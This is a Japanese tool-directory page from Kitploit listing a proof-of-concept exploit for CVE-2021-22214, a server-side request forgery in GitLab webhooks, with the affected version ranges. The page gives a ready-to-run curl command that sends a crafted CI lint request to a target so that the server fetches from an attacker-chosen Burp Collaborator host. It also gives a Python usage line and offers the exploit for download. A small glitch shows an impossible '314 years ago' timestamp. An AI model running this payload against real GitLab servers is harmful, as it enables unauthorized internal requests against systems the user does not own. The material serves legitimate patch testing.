Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
GitLab-SSRF-CVE-2021-22214 — CVE-2021-22214の概念実証エクスプロイト。GitLabのWebhookにおけるサーバーサイドリクエストフォージェリ(SSRF)であり、認証されていない攻撃者が内部HTTPリクエストを実行できるようにします。 | Kitploit
ツール/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティ
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

CVE-2021-22214の概念実証エクスプロイト。GitLabのWebhookにおけるサーバーサイドリクエストフォージェリ(SSRF)であり、認証されていない攻撃者が内部HTTPリクエストを実行できるようにします。

リポジトリを見る
ウェブサイト
314年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-22214

CVE-2021-22214 のPOC: Gitlab SSRF

説明

リモートのGitLabインストールには、Webhook用の内部ネットワークが有効になっていることに起因するサーバーサイドリクエストフォージェリ(SSRF)の脆弱性が含まれています。リモートの未認証の攻撃者は、登録制限のあるGitLabインスタンスを悪用して、攻撃者が選択した任意のドメインに対してHTTPリクエストを送信させることができます。

使用方法

  • Pythonコード

    root@kitploit:~
    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>
    
  • Curlコマンド

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

影響を受けるバージョン

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

参考

  • GitLab SSRF (CVE-2021-22214)
  • tenable.com
ツールをダウンロード